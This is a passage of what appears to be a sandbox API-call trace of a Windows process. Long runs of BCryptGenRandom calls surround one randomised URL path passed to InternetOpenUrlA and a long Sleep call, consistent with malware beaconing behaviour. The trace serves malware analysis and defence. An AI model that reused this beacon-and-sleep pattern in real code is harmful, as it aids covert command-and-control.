hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.203] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.203] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.203] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.203] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.203] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.203] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.203] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.204] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.204] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.204] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.204] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.204] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.204] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.204] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.205] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.205] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.205] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.205] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.205] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.205] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.206] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.206] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0259.206] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.206] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.206] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.206] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.206] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.206] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.206] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.206] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.207] GetProcessHeap () returned 0x440000 [0259.207] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4724e0 [0259.207] lstrcpyA (in: lpString1=0x4724e0, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0259.207] lstrcatA (in: lpString1="\x04", lpString2="/xjik0cpvfscluYzKQk8ku/f9mojmflWamm3EerJeetFvxymO6rth7UF72v/iydx6tc1u9brG4mwy6w7gZeyrD4xdgqpYv/eo7y4Sj81qc0mtnwb7Wrw6ntak7knuU2mM7cuk6ZrLx7jgp/" | out: lpString1="\x04/xjik0cpvfscluYzKQk8ku/f9mojmflWamm3EerJeetFvxymO6rth7UF72v/iydx6tc1u9brG4mwy6w7gZeyrD4xdgqpYv/eo7y4Sj81qc0mtnwb7Wrw6ntak7knuU2mM7cuk6ZrLx7jgp/") returned="\x04/xjik0cpvfscluYzKQk8ku/f9mojmflWamm3EerJeetFvxymO6rth7UF72v/iydx6tc1u9brG4mwy6w7gZeyrD4xdgqpYv/eo7y4Sj81qc0mtnwb7Wrw6ntak7knuU2mM7cuk6ZrLx7jgp/" [0259.207] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0259.207] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/xjik0cpvfscluYzKQk8ku/f9mojmflWamm3EerJeetFvxymO6rth7UF72v/iydx6tc1u9brG4mwy6w7gZeyrD4xdgqpYv/eo7y4Sj81qc0mtnwb7Wrw6ntak7knuU2mM7cuk6ZrLx7jgp/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0259.207] GetProcessHeap () returned 0x440000 [0259.207] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4724e0 | out: hHeap=0x440000) returned 1 [0259.207] GetProcessHeap () returned 0x440000 [0259.207] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d4eb0 | out: hHeap=0x440000) returned 1 [0259.207] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0259.208] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0259.208] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.208] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0259.208] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0259.208] Sleep (dwMilliseconds=0x1729a) [0259.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0259.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0259.338] GetProcessHeap () returned 0x440000 [0259.338] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a01d50 [0259.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0259.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01d51, cbBuffer=0x17, dwFlags=0x2 | out: pbBuffer=0x3a01d51) returned 0x0 [0259.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0259.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.341] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.341] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.341] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.341] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.341] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0259.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01d68, cbBuffer=0x1e, dwFlags=0x2 | out: pbBuffer=0x3a01d68) returned 0x0 [0259.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.343] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.343] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.343] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0259.343] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.344] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.344] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.344] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.344] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.345] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.345] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.345] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.346] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.346] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.346] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.346] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.348] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.348] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.348] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.348] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.348] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.348] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.348] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.349] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.349] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.349] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.349] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.349] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.349] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.349] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.349] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.349] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.350] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.350] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.350] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0259.350] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.350] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01d86, cbBuffer=0x16, dwFlags=0x2 | out: pbBuffer=0x3a01d86) returned 0x0 [0259.350] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.350] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.350] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0259.351] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0259.351] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.351] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.351] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.352] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.352] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.352] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.352] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.352] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.353] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.353] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.353] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.353] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.354] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.354] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.354] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.354] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0259.354] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01d9c, cbBuffer=0x30, dwFlags=0x2 | out: pbBuffer=0x3a01d9c) returned 0x0 [0259.355] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.355] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.355] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.355] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.355] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.355] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.355] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.355] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.355] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.356] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, 